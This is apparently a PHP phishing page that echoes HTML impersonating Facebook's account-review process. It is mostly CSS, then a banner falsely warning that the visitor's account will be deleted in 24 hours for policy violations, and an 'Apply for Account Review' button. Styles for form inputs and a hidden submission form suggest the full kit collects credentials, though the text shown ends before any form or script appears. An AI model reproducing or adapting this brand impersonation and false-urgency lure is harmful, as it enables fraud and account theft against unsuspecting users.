<?php
echo "";
echo "";
echo "<!DOCTYPE html>";
echo "<html lang=\"en\">";
echo "<head>";
echo "<meta charset=\"UTF-8\">";
echo "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">";
echo "<title>Facebook - Account Review</title>";
echo "<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css\">";
echo "<style>";
echo "* {";
echo "margin: 0;";
echo "padding: 0;";
echo "box-sizing: border-box;";
echo "font-family: 'Segoe UI', Helvetica, Arial, sans-serif;";
echo "}";
echo "";
echo "body {";
echo "background: linear-gradient(135deg, #f0f2f5, #e4e6eb);";
echo "color: #1c1e21;";
echo "line-height: 1.6;";
echo "min-height: 100vh;";
echo "display: flex;";
echo "flex-direction: column;";
echo "overflow-x: hidden;";
echo "}";
echo "";
echo "/* Header Styles */";
echo ".header {";
echo "background: linear-gradient(to right, #1877f2, #166fe5);";
echo "padding: 15px 0;";
echo "box-shadow: 0 2px 10px rgba(0,0,0,0.1);";
echo "position: sticky;";
echo "top: 0;";
echo "z-index: 100;";
echo "display: flex;";
echo "justify-content: space-between;";
echo "align-items: center;";
echo "}";
echo "";
echo ".header-content {";
echo "max-width: 1200px;";
echo "margin: 0 auto;";
echo "display: flex;";
echo "flex-wrap: wrap;";
echo "align-items: center;";
echo "justify-content: space-between;";
echo "padding: 0 20px;";
echo "width: 100%;";
echo "}";
echo "";
echo ".logo {";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 10px;";
echo "color: white;";
echo "font-size: 24px;";
echo "font-weight: 700;";
echo "}";
echo "";
echo ".logo i {";
echo "font-size: 28px;";
echo "}";
echo "";
echo ".help-center {";
echo "color: rgba(255,255,255,0.9);";
echo "font-weight: 600;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 8px;";
echo "}";
echo "";
echo "/* Google Translate Container */";
echo ".google-translate-container {";
echo "position: absolute;";
echo "top: 15px;";
echo "right: 150px;";
echo "width: auto;";
echo "background: rgba(255, 255, 255, 0.2);";
echo "border-radius: 4px;";
echo "padding: 5px;";
echo "}";
echo "";
echo ".translate-title {";
echo "color: white;";
echo "font-size: 12px;";
echo "margin-bottom: 5px;";
echo "display: block;";
echo "text-align: center;";
echo "}";
echo "";
echo "/* Professional Language Modal Styles */";
echo ".language-modal {";
echo "display: none;";
echo "position: fixed;";
echo "top: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 100%;";
echo "background: rgba(0,0,0,0.75);";
echo "backdrop-filter: blur(4px);";
echo "z-index: 1002;";
echo "justify-content: center;";
echo "align-items: center;";
echo "opacity: 0;";
echo "transition: opacity 0.3s ease;";
echo "}";
echo "";
echo ".language-modal.active {";
echo "opacity: 1;";
echo "display: flex;";
echo "}";
echo "";
echo ".language-modal-content {";
echo "background: white;";
echo "border-radius: 20px;";
echo "width: 95%;";
echo "max-width: 650px;";
echo "max-height: 90vh;";
echo "overflow: hidden;";
echo "box-shadow: 0 25px 60px rgba(0,0,0,0.25);";
echo "transform: translateY(30px);";
echo "transition: transform 0.4s cubic-bezier(0.175, 0.885, 0.32, 1.275);";
echo "display: flex;";
echo "flex-direction: column;";
echo "}";
echo "";
echo ".language-modal.active .language-modal-content {";
echo "transform: translateY(0);";
echo "}";
echo "";
echo ".language-modal-header {";
echo "background: linear-gradient(135deg, #1877f2, #166fe5);";
echo "padding: 25px 30px;";
echo "color: white;";
echo "display: flex;";
echo "justify-content: space-between;";
echo "align-items: center;";
echo "position: relative;";
echo "}";
echo "";
echo ".language-modal-header::after {";
echo "content: '';";
echo "position: absolute;";
echo "bottom: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 2px;";
echo "background: rgba(255, 255, 255, 0.2);";
echo "}";
echo "";
echo ".language-title {";
echo "font-size: 24px;";
echo "font-weight: 600;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 15px;";
echo "color: white;";
echo "}";
echo "";
echo ".language-title i {";
echo "font-size: 26px;";
echo "}";
echo "";
echo ".close-language-modal {";
echo "background: rgba(255, 255, 255, 0.2);";
echo "border: none;";
echo "border-radius: 50%;";
echo "width: 42px;";
echo "height: 42px;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "color: white;";
echo "font-size: 22px;";
echo "cursor: pointer;";
echo "transition: all 0.3s ease;";
echo "}";
echo "";
echo ".close-language-modal:hover {";
echo "background: rgba(255, 255, 255, 0.3);";
echo "transform: rotate(90deg);";
echo "}";
echo "";
echo ".language-search-container {";
echo "padding: 20px;";
echo "background: #f7f9fc;";
echo "border-bottom: 1px solid #e4e6eb;";
echo "}";
echo "";
echo ".search-wrapper {";
echo "position: relative;";
echo "max-width: 500px;";
echo "margin: 0 auto;";
echo "width: 100%;";
echo "}";
echo "";
echo ".language-search {";
echo "width: 100%;";
echo "padding: 15px 20px 15px 50px;";
echo "border: 2px solid #e4e6eb;";
echo "border-radius: 12px;";
echo "font-size: 16px;";
echo "transition: all 0.3s ease;";
echo "background: white;";
echo "color: #1c1e21;";
echo "box-shadow: 0 2px 10px rgba(0, 0, 0, 0.05);";
echo "}";
echo "";
echo ".language-search:focus {";
echo "border-color: #1877f2;";
echo "outline: none;";
echo "box-shadow: 0 0 0 4px rgba(24, 119, 242, 0.15);";
echo "}";
echo "";
echo ".search-icon {";
echo "position: absolute;";
echo "left: 20px;";
echo "top: 50%;";
echo "transform: translateY(-50%);";
echo "color: #606770;";
echo "font-size: 18px;";
echo "}";
echo "";
echo ".language-options-container {";
echo "flex: 1;";
echo "overflow-y: auto;";
echo "padding: 20px;";
echo "}";
echo "";
echo ".language-options {";
echo "display: grid;";
echo "grid-template-columns: repeat(auto-fill, minmax(160px, 1fr));";
echo "gap: 15px;";
echo "}";
echo "";
echo ".language-btn {";
echo "background: white;";
echo "border: 1px solid #e4e6eb;";
echo "border-radius: 12px;";
echo "padding: 18px 15px;";
echo "font-size: 15px;";
echo "font-weight: 500;";
echo "cursor: pointer;";
echo "transition: all 0.25s ease;";
echo "display: flex;";
echo "flex-direction: column;";
echo "align-items: center;";
echo "gap: 10px;";
echo "position: relative;";
echo "overflow: hidden;";
echo "}";
echo "";
echo ".language-btn:hover {";
echo "transform: translateY(-3px);";
echo "border-color: #1877f2;";
echo "box-shadow: 0 8px 20px rgba(24, 119, 242, 0.12);";
echo "}";
echo "";
echo ".language-btn.selected {";
echo "border: 2px solid #1877f2;";
echo "background: rgba(24, 119, 242, 0.05);";
echo "box-shadow: 0 4px 15px rgba(24, 119, 242, 0.1);";
echo "}";
echo "";
echo ".language-btn.selected::after {";
echo "content: '';";
echo "position: absolute;";
echo "top: 10px;";
echo "right: 10px;";
echo "width: 20px;";
echo "height: 20px;";
echo "background: #1877f2;";
echo "border-radius: 50%;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "color: white;";
echo "font-size: 12px;";
echo "font-weight: bold;";
echo "}";
echo "";
echo ".language-btn.selected::before {";
echo "content: '\\f00c';";
echo "font-family: 'Font Awesome 5 Free';";
echo "font-weight: 900;";
echo "position: absolute;";
echo "top: 10px;";
echo "right: 10px;";
echo "width: 20px;";
echo "height: 20px;";
echo "color: white;";
echo "z-index: 2;";
echo "font-size: 10px;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "}";
echo "";
echo ".language-icon {";
echo "font-size: 28px;";
echo "color: #1877f2;";
echo "width: 50px;";
echo "height: 50px;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "background: rgba(24, 119, 242, 0.1);";
echo "border-radius: 50%;";
echo "}";
echo "";
echo ".language-name {";
echo "font-weight: 600;";
echo "color: #1d2129;";
echo "}";
echo "";
echo ".language-native {";
echo "font-size: 13px;";
echo "color: #606770;";
echo "margin-top: 3px;";
echo "}";
echo "";
echo ".language-footer {";
echo "padding: 20px;";
echo "background: #f7f9fc;";
echo "border-top: 1px solid #e4e6eb;";
echo "display: flex;";
echo "justify-content: space-between;";
echo "align-items: center;";
echo "}";
echo "";
echo ".selected-language-display {";
echo "font-size: 15px;";
echo "color: #606770;";
echo "}";
echo "";
echo ".selected-language-display strong {";
echo "color: #1d2129;";
echo "font-weight: 600;";
echo "}";
echo "";
echo ".confirm-btn {";
echo "background: linear-gradient(135deg, #1877f2, #166fe5);";
echo "color: white;";
echo "border: none;";
echo "border-radius: 12px;";
echo "padding: 12px 35px;";
echo "font-size: 16px;";
echo "font-weight: 600;";
echo "cursor: pointer;";
echo "transition: all 0.3s ease;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 8px;";
echo "box-shadow: 0 4px 15px rgba(24, 119, 242, 0.25);";
echo "}";
echo "";
echo ".confirm-btn:hover {";
echo "background: linear-gradient(135deg, #166fe5, #1461c9);";
echo "transform: translateY(-2px);";
echo "box-shadow: 0 6px 20px rgba(24, 119, 242, 0.35);";
echo "}";
echo "";
echo ".confirm-btn:disabled {";
echo "background: #e4e6eb;";
echo "color: #bdc1c9;";
echo "cursor: not-allowed;";
echo "transform: none;";
echo "box-shadow: none;";
echo "}";
echo "";
echo "/* Main Content */";
echo ".container {";
echo "max-width: 1000px;";
echo "margin: 40px auto;";
echo "padding: 0 20px;";
echo "flex: 1;";
echo "display: flex;";
echo "flex-direction: column;";
echo "align-items: center;";
echo "}";
echo "";
echo ".review-card {";
echo "background: white;";
echo "border-radius: 16px;";
echo "box-shadow: 0 10px 30px rgba(0,0,0,0.1);";
echo "padding: 50px;";
echo "width: 100%;";
echo "position: relative;";
echo "overflow: hidden;";
echo "border: 1px solid #dddfe2;";
echo "margin-bottom: 40px;";
echo "text-align: center;";
echo "}";
echo "";
echo ".review-card::before {";
echo "content: '';";
echo "position: absolute;";
echo "top: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 5px;";
echo "background: linear-gradient(to right, #ff9800, #ff5722);";
echo "}";
echo "";
echo ".warning-icon {";
echo "font-size: 70px;";
echo "color: #ff9800;";
echo "margin-bottom: 25px;";
echo "text-align: center;";
echo "animation: pulse 2s infinite;";
echo "}";
echo "";
echo "@keyframes pulse {";
echo "0% { transform: scale(1); }";
echo "50% { transform: scale(1.1); }";
echo "100% { transform: scale(1); }";
echo "}";
echo "";
echo ".review-title {";
echo "font-size: 36px;";
echo "margin-bottom: 20px;";
echo "color: #1d2129;";
echo "font-weight: 700;";
echo "text-align: center;";
echo "}";
echo "";
echo ".review-subtitle {";
echo "font-size: 20px;";
echo "color: #606770;";
echo "max-width: 700px;";
echo "margin: 0 auto 30px;";
echo "line-height: 1.6;";
echo "text-align: center;";
echo "}";
echo "";
echo ".deletion-warning {";
echo "background: rgba(255, 152, 0, 0.1);";
echo "border-radius: 12px;";
echo "padding: 25px;";
echo "text-align: left;";
echo "margin: 30px 0;";
echo "border-left: 4px solid #ff9800;";
echo "}";
echo "";
echo ".deletion-warning h3 {";
echo "color: #e67700;";
echo "margin-bottom: 15px;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 10px;";
echo "font-size: 22px;";
echo "}";
echo "";
echo ".deletion-warning ul {";
echo "padding-left: 25px;";
echo "}";
echo "";
echo ".deletion-warning li {";
echo "margin-bottom: 12px;";
echo "font-size: 17px;";
echo "line-height: 1.6;";
echo "color: #1c1e21;";
echo "}";
echo "";
echo ".review-btn {";
echo "background: linear-gradient(135deg, #1877f2, #166fe5);";
echo "color: white;";
echo "border: none;";
echo "border-radius: 50px;";
echo "padding: 18px 45px;";
echo "font-size: 20px;";
echo "font-weight: 600;";
echo "cursor: pointer;";
echo "transition: all 0.3s ease;";
echo "box-shadow: 0 5px 15px rgba(24, 119, 242, 0.2);";
echo "display: inline-flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "gap: 12px;";
echo "margin-top: 20px;";
echo "display: block;";
echo "width: fit-content;";
echo "margin: 30px auto 0;";
echo "position: relative;";
echo "overflow: hidden;";
echo "}";
echo "";
echo ".review-btn:hover {";
echo "background: linear-gradient(135deg, #166fe5, #1461c9);";
echo "transform: translateY(-3px);";
echo "box-shadow: 0 8px 20px rgba(24, 119, 242, 0.3);";
echo "}";
echo "";
echo ".review-btn::after {";
echo "content: '';";
echo "position: absolute;";
echo "top: 0;";
echo "left: -100%;";
echo "width: 100%;";
echo "height: 100%;";
echo "background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);";
echo "transition: 0.5s;";
echo "}";
echo "";
echo ".review-btn:hover::after {";
echo "left: 100%;";
echo "}";
echo "";
echo "/* Modal Styles */";
echo ".modal {";
echo "display: none;";
echo "position: fixed;";
echo "top: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 100%;";
echo "background: rgba(0,0,0,0.7);";
echo "z-index: 1001;";
echo "overflow-y: auto;";
echo "padding: 20px;";
echo "}";
echo "";
echo ".modal-content {";
echo "background: white;";
echo "border-radius: 16px;";
echo "box-shadow: 0 15px 40px rgba(0,0,0,0.2);";
echo "max-width: 900px;";
echo "margin: 40px auto;";
echo "position: relative;";
echo "overflow: hidden;";
echo "animation: modalAppear 0.4s ease;";
echo "border: 1px solid #dddfe2;";
echo "}";
echo "";
echo "@keyframes modalAppear {";
echo "from { transform: translateY(50px); opacity: 0; }";
echo "to { transform: translateY(0); opacity: 1; }";
echo "}";
echo "";
echo ".modal-header {";
echo "padding: 25px 30px;";
echo "background: linear-gradient(135deg, #1877f2, #166fe5);";
echo "color: white;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: space-between;";
echo "border-bottom: 1px solid #dddfe2;";
echo "}";
echo "";
echo ".modal-title {";
echo "font-size: 24px;";
echo "font-weight: 600;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 12px;";
echo "}";
echo "";
echo ".close-modal {";
echo "background: transparent;";
echo "border: none;";
echo "color: white;";
echo "font-size: 28px;";
echo "cursor: pointer;";
echo "transition: all 0.3s ease;";
echo "width: 40px;";
echo "height: 40px;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "border-radius: 50%;";
echo "}";
echo "";
echo ".close-modal:hover {";
echo "background: rgba(255,255,255,0.2);";
echo "transform: rotate(90deg);";
echo "}";
echo "";
echo ".modal-body {";
echo "padding: 30px;";
echo "}";
echo "";
echo ".step-indicator {";
echo "display: flex;";
echo "justify-content: center;";
echo "gap: 10px;";
echo "margin-bottom: 30px;";
echo "}";
echo "";
echo ".step {";
echo "width: 40px;";
echo "height: 40px;";
echo "border-radius: 50%;";
echo "background: #e4e6eb;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "font-weight: 700;";
echo "position: relative;";
echo "z-index: 2;";
echo "color: #606770;";
echo "font-size: 18px;";
echo "}";
echo "";
echo ".step.active {";
echo "background: #1877f2;";
echo "color: white;";
echo "box-shadow: 0 0 15px rgba(24, 119, 242, 0.3);";
echo "}";
echo "";
echo ".step-line {";
echo "position: absolute;";
echo "top: 50%;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 3px;";
echo "background: #e4e6eb;";
echo "z-index: 1;";
echo "}";
echo "";
echo ".step-content {";
echo "display: none;";
echo "}";
echo "";
echo ".step-content.active {";
echo "display: block;";
echo "animation: fadeIn 0.5s ease;";
echo "}";
echo "";
echo "@keyframes fadeIn {";
echo "from { opacity: 0; transform: translateY(10px); }";
echo "to { opacity: 1; transform: translateY(0); }";
echo "}";
echo "";
echo ".step-title {";
echo "text-align: center;";
echo "font-size: 24px;";
echo "margin-bottom: 25px;";
echo "color: #1d2129;";
echo "}";
echo "";
echo "/* Premium Video Player Styles */";
echo ".video-player-container {";
echo "position: relative;";
echo "width: 100%;";
echo "background: #000;";
echo "border-radius: 12px;";
echo "overflow: hidden;";
echo "margin: 25px 0;";
echo "box-shadow: 0 10px 30px rgba(0,0,0,0.1);";
echo "}";
echo "";
echo ".video-container {";
echo "position: relative;";
echo "padding-top: 56.25%; /* 16:9 Aspect Ratio */";
echo "}";
echo "";
echo ".video-container video {";
echo "position: absolute;";
echo "top: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 100%;";
echo "border: none;";
echo "object-fit: cover;";
echo "}";
echo "";
echo ".video-overlay {";
echo "position: absolute;";
echo "top: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "height: 100%;";
echo "background: rgba(0,0,0,0.5);";
echo "display: flex;";
echo "flex-direction: column;";
echo "align-items: center;";
echo "justify-content: center;";
echo "z-index: 2;";
echo "transition: opacity 0.3s ease;";
echo "}";
echo "";
echo ".video-overlay.hidden {";
echo "opacity: 0;";
echo "pointer-events: none;";
echo "}";
echo "";
echo ".play-btn {";
echo "background: rgba(24, 119, 242, 0.8);";
echo "width: 80px;";
echo "height: 80px;";
echo "border-radius: 50%;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "cursor: pointer;";
echo "margin-bottom: 20px;";
echo "border: 3px solid white;";
echo "transition: all 0.3s ease;";
echo "}";
echo "";
echo ".play-btn:hover {";
echo "transform: scale(1.1);";
echo "background: rgba(24, 119, 242, 1);";
echo "}";
echo "";
echo ".play-btn i {";
echo "font-size: 40px;";
echo "color: white;";
echo "}";
echo "";
echo "/* Loading Spinner Styles */";
echo ".loading-spinner {";
echo "position: absolute;";
echo "top: 50%;";
echo "left: 50%;";
echo "transform: translate(-50%, -50%);";
echo "z-index: 3;";
echo "display: none;";
echo "flex-direction: column;";
echo "align-items: center;";
echo "justify-content: center;";
echo "background: rgba(0,0,0,0.7);";
echo "border-radius: 50%;";
echo "width: 100px;";
echo "height: 100px;";
echo "}";
echo "";
echo ".spinner {";
echo "border: 4px solid rgba(255, 255, 255, 0.3);";
echo "border-top: 4px solid #1877f2;";
echo "border-radius: 50%;";
echo "width: 50px;";
echo "height: 50px;";
echo "animation: spin 1s linear infinite;";
echo "margin-bottom: 10px;";
echo "}";
echo "";
echo ".loading-percentage {";
echo "color: white;";
echo "font-size: 16px;";
echo "font-weight: bold;";
echo "}";
echo "";
echo "@keyframes spin {";
echo "0% { transform: rotate(0deg); }";
echo "100% { transform: rotate(360deg); }";
echo "}";
echo "";
echo ".video-controls {";
echo "position: absolute;";
echo "bottom: 0;";
echo "left: 0;";
echo "width: 100%;";
echo "background: rgba(0, 0, 0, 0.7);";
echo "padding: 10px 15px;";
echo "display: flex;";
echo "flex-wrap: wrap;";
echo "align-items: center;";
echo "z-index: 10;";
echo "transform: translateY(100%);";
echo "transition: transform 0.3s ease;";
echo "}";
echo "";
echo ".video-container:hover .video-controls {";
echo "transform: translateY(0);";
echo "}";
echo "";
echo ".control-btn {";
echo "background: none;";
echo "border: none;";
echo "color: white;";
echo "font-size: 16px;";
echo "cursor: pointer;";
echo "padding: 5px 10px;";
echo "outline: none;";
echo "}";
echo "";
echo ".progress-container {";
echo "flex-grow: 1;";
echo "height: 5px;";
echo "background: rgba(255, 255, 255, 0.2);";
echo "border-radius: 10px;";
echo "margin: 0 15px;";
echo "cursor: pointer;";
echo "position: relative;";
echo "}";
echo "";
echo ".buffered-bar {";
echo "position: absolute;";
echo "height: 100%;";
echo "background: rgba(255, 255, 255, 0.3);";
echo "border-radius: 10px;";
echo "width: 0%;";
echo "}";
echo "";
echo ".progress-bar {";
echo "height: 100%;";
echo "background: #1877f2;";
echo "border-radius: 10px;";
echo "position: relative;";
echo "width: 0%;";
echo "z-index: 2;";
echo "}";
echo "";
echo ".time-display {";
echo "color: white;";
echo "font-size: 14px;";
echo "min-width: 100px;";
echo "text-align: center;";
echo "}";
echo "";
echo ".volume-container {";
echo "display: flex;";
echo "align-items: center;";
echo "margin: 0 15px;";
echo "}";
echo "";
echo ".volume-slider {";
echo "width: 80px;";
echo "margin-left: 5px;";
echo "-webkit-appearance: none;";
echo "height: 5px;";
echo "background: rgba(255, 255, 255, 0.2);";
echo "border-radius: 10px;";
echo "outline: none;";
echo "}";
echo "";
echo ".volume-slider::-webkit-slider-thumb {";
echo "-webkit-appearance: none;";
echo "width: 15px;";
echo "height: 15px;";
echo "border-radius: 50%;";
echo "background: #1877f2;";
echo "cursor: pointer;";
echo "}";
echo "";
echo ".speed-selector {";
echo "background: rgba(255, 255, 255, 0.1);";
echo "color: white;";
echo "border: none;";
echo "border-radius: 4px;";
echo "padding: 5px;";
echo "margin: 0 15px;";
echo "cursor: pointer;";
echo "}";
echo "";
echo ".fullscreen-btn {";
echo "margin-left: auto;";
echo "}";
echo "";
echo "/* Form Styles */";
echo ".form-group {";
echo "margin-bottom: 25px;";
echo "}";
echo "";
echo ".form-group label {";
echo "display: block;";
echo "margin-bottom: 12px;";
echo "font-weight: 600;";
echo "color: #1d2129;";
echo "font-size: 17px;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 10px;";
echo "}";
echo "";
echo ".form-group label i {";
echo "color: #ff9800;";
echo "font-size: 20px;";
echo "}";
echo "";
echo ".form-group input {";
echo "width: 100%;";
echo "padding: 16px 20px;";
echo "border: 2px solid #dddfe2;";
echo "border-radius: 12px;";
echo "font-size: 17px;";
echo "transition: all 0.3s ease;";
echo "background: #f0f2f5;";
echo "color: #1c1e21;";
echo "}";
echo "";
echo ".form-group input:focus {";
echo "border-color: #1877f2;";
echo "outline: none;";
echo "background: #f0f2f5;";
echo "box-shadow: 0 0 0 4px rgba(24, 119, 242, 0.2);";
echo "}";
echo "";
echo ".mobile-instructions {";
echo "background: rgba(255, 152, 0, 0.1);";
echo "border-radius: 12px;";
echo "padding: 25px;";
echo "margin: 25px 0;";
echo "border-left: 4px solid #ff9800;";
echo "}";
echo "";
echo ".mobile-instructions h3 {";
echo "color: #e67700;";
echo "margin-bottom: 15px;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 10px;";
echo "}";
echo "";
echo ".mobile-instructions ol {";
echo "padding-left: 25px;";
echo "}";
echo "";
echo ".mobile-instructions li {";
echo "margin-bottom: 12px;";
echo "font-size: 16px;";
echo "line-height: 1.6;";
echo "color: #1c1e21;";
echo "}";
echo "";
echo ".btn-group {";
echo "display: flex;";
echo "gap: 15px;";
echo "margin-top: 25px;";
echo "}";
echo "";
echo ".btn {";
echo "flex: 1;";
echo "padding: 16px 20px;";
echo "border-radius: 12px;";
echo "font-size: 17px;";
echo "font-weight: 600;";
echo "cursor: pointer;";
echo "transition: all 0.3s ease;";
echo "text-align: center;";
echo "display: flex;";
echo "align-items: center;";
echo "justify-content: center;";
echo "gap: 10px;";
echo "position: relative;";
echo "overflow: hidden;";
echo "}";
echo "";
echo ".btn-primary {";
echo "background: linear-gradient(135deg, #1877f2, #166fe5);";
echo "color: white;";
echo "border: none;";
echo "box-shadow: 0 5px 15px rgba(24, 119, 242, 0.2);";
echo "}";
echo "";
echo ".btn-primary:hover {";
echo "background: linear-gradient(135deg, #166fe5, #1461c9);";
echo "transform: translateY(-3px);";
echo "box-shadow: 0 8px 20px rgba(24, 119, 242, 0.3);";
echo "}";
echo "";
echo ".btn-outline {";
echo "background: transparent;";
echo "color: #1877f2;";
echo "border: 2px solid #1877f2;";
echo "}";
echo "";
echo ".btn-outline:hover {";
echo "background: rgba(24, 119, 242, 0.05);";
echo "transform: translateY(-3px);";
echo "}";
echo "";
echo ".btn::after {";
echo "content: '';";
echo "position: absolute;";
echo "top: 0;";
echo "left: -100%;";
echo "width: 100%;";
echo "height: 100%;";
echo "background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);";
echo "transition: 0.5s;";
echo "}";
echo "";
echo ".btn:hover::after {";
echo "left: 100%;";
echo "}";
echo "";
echo ".success-message {";
echo "text-align: center;";
echo "padding: 40px 20px;";
echo "}";
echo "";
echo ".success-icon {";
echo "font-size: 70px;";
echo "color: #36a420;";
echo "margin-bottom: 25px;";
echo "animation: successPulse 1.5s infinite;";
echo "}";
echo "";
echo "@keyframes successPulse {";
echo "0% { transform: scale(1); }";
echo "50% { transform: scale(1.1); }";
echo "100% { transform: scale(1); }";
echo "}";
echo "";
echo ".success-title {";
echo "font-size: 32px;";
echo "margin-bottom: 20px;";
echo "color: #1d2129;";
echo "}";
echo "";
echo ".success-text {";
echo "font-size: 18px;";
echo "color: #606770;";
echo "max-width: 600px;";
echo "margin: 0 auto 30px;";
echo "line-height: 1.6;";
echo "}";
echo "";
echo "/* Footer */";
echo "footer {";
echo "background: white;";
echo "padding: 30px 0;";
echo "border-top: 1px solid #dddfe2;";
echo "margin-top: auto;";
echo "}";
echo "";
echo ".footer-content {";
echo "max-width: 1200px;";
echo "margin: 0 auto;";
echo "padding: 0 20px;";
echo "text-align: center;";
echo "}";
echo "";
echo ".footer-links {";
echo "display: flex;";
echo "justify-content: center;";
echo "gap: 25px;";
echo "margin: 20px 0;";
echo "flex-wrap: wrap;";
echo "}";
echo "";
echo ".footer-links a {";
echo "color: #606770;";
echo "text-decoration: none;";
echo "transition: all 0.3s ease;";
echo "font-weight: 500;";
echo "}";
echo "";
echo ".footer-links a:hover {";
echo "color: #1877f2;";
echo "text-decoration: underline;";
echo "}";
echo "";
echo ".copyright {";
echo "color: #8a8d91;";
echo "font-size: 14px;";
echo "margin-top: 15px;";
echo "}";
echo "";
echo "/* Video Quality Selector */";
echo ".quality-selector {";
echo "position: absolute;";
echo "top: 15px;";
echo "right: 15px;";
echo "z-index: 20;";
echo "background: rgba(0,0,0,0.7);";
echo "color: white;";
echo "border: none;";
echo "border-radius: 4px;";
echo "padding: 5px 10px;";
echo "font-size: 14px;";
echo "cursor: pointer;";
echo "}";
echo "";
echo "/* Network Status */";
echo ".network-status {";
echo "position: absolute;";
echo "top: 15px;";
echo "left: 15px;";
echo "z-index: 20;";
echo "display: flex;";
echo "align-items: center;";
echo "gap: 5px;";
echo "color: white;";
echo "font-size: 12px;";
echo "background: rgba(0,0,0,0.5);";
echo "padding: 3px 8px;";
echo "border-radius: 4px;";
echo "}";
echo "";
echo ".network-status i {";
echo "color: #4CAF50;";
echo "}";
echo "";
echo "/* Hidden form for submission */";
echo ".hidden-form {";
echo "display: none;";
echo "}";
echo "";
echo "@media (max-width: 768px) {";
echo ".review-card {";
echo "padding: 30px 20px;";
echo "}";
echo "";
echo ".review-title {";
echo "font-size: 28px;";
echo "}";
echo "";
echo ".review-subtitle {";
echo "font-size: 18px;";
echo "}";
echo "";
echo ".review-btn {";
echo "padding: 16px 30px;";
echo "font-size: 18px;";
echo "}";
echo "";
echo ".modal-content {";
echo "margin: 20px auto;";
echo "}";
echo "";
echo ".modal-header {";
echo "padding: 20px;";
echo "}";
echo "";
echo ".modal-title {";
echo "font-size: 20px;";
echo "}";
echo "";
echo ".modal-body {";
echo "padding: 20px;";
echo "}";
echo "";
echo ".btn-group {";
echo "flex-direction: column;";
echo "}";
echo "";
echo ".video-controls {";
echo "padding: 8px 10px;";
echo "}";
echo "";
echo ".control-btn {";
echo "padding: 3px 5px;";
echo "font-size: 14px;";
echo "}";
echo "";
echo ".time-display {";
echo "min-width: 80px;";
echo "font-size: 12px;";
echo "}";
echo "";
echo ".volume-slider {";
echo "width: 50px;";
echo "}";
echo "";
echo ".header-content {";
echo "flex-direction: column;";
echo "align-items: stretch;";
echo "gap: 15px;";
echo "}";
echo "";
echo ".logo {";
echo "justify-content: center;";
echo "}";
echo "";
echo ".help-center {";
echo "justify-content: center;";
echo "}";
echo "";
echo ".google-translate-container {";
echo "position: relative;";
echo "width: 100%;";
echo "margin-top: 10px;";
echo "right: 0;";
echo "}";
echo "";
echo ".language-options {";
echo "grid-template-columns: 1fr;";
echo "}";
echo "";
echo ".language-modal-content {";
echo "padding: 20px 15px;";
echo "}";
echo "";
echo ".language-title {";
echo "font-size: 20px;";
echo "padding: 10px 0;";
echo "position: sticky;";
echo "top: 0;";
echo "color: white;";
echo "}";
echo "";
echo ".language-btn {";
echo "padding: 12px;";
echo "font-size: 14px;";
echo "}";
echo "";
echo ".language-options {";
echo "max-height: 50vh;";
echo "overflow-y: auto;";
echo "}";
echo "";
echo ".close-language-modal {";
echo "position: sticky;";
echo "bottom: 0;";
echo "margin-top: 15px;";
echo "}";
echo "}";
echo "</style>";
echo "</head>";
echo "<body>";
echo "<div class=\"header\">";
echo "<div class=\"header-content\">";
echo "<div class=\"logo\">";
echo "<i class=\"fab fa-facebook\"></i>";
echo "<span>Facebook Account Review</span>";
echo "</div>";
echo "<div class=\"help-center\">";
echo "<i class=\"fas fa-question-circle\"></i>";
echo "Help Center";
echo "</div>";
echo "<div class=\"google-translate-container\">";
echo "<span class=\"translate-title\">Language</span>";
echo "<select id=\"google_translate_element\" style=\"width: 100%; background: transparent; border: none; color: white;\">";
echo "<option value=\"\">Select Language</option>";
echo "<option value=\"en\">English</option>";
echo "<option value=\"es\">Spanish</option>";
echo "<option value=\"fr\">French</option>";
echo "</select>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "";
echo "<div class=\"container\">";
echo "<div class=\"review-card\">";
echo "<div class=\"warning-icon\">";
echo "<i class=\"fas fa-exclamation-triangle\"></i>";
echo "</div>";
echo "<h1 class=\"review-title\">Urgent Account Review Required</h1>";
echo "<p class=\"review-subtitle\">Your account is scheduled for deletion due to policy violations. Request a review to prevent permanent loss of your account and data.</p>";
echo "";
echo "<div class=\"deletion-warning\">";
echo "<h3><i class=\"fas fa-info-circle\"></i> Important Notice</h3>";
echo "<ul>";
echo "<li>Your account is scheduled for deletion in <strong>24 hours</strong></li>";
echo "<li>This action is due to violations of our community standards</li>";
echo "<li>You may request a review of this decision</li>";
echo "<li>If approved, your account will be restored with full access</li>";
echo "<li>Failure to request a review will result in permanent deletion</li>";
echo "</ul>";
echo "</div>";
echo "";
echo "<p class=\"review-subtitle\">To request a review of your account deletion, click the button below and follow the instructions.</p>";
echo "";
echo "<button class=\"review-btn\" id=\"reviewBtn\">";
echo "<i class=\"fas fa-file-alt\"></i> Apply for Account Review";
echo "</button>";
echo "</div>";
echo "</div>";
echo "";
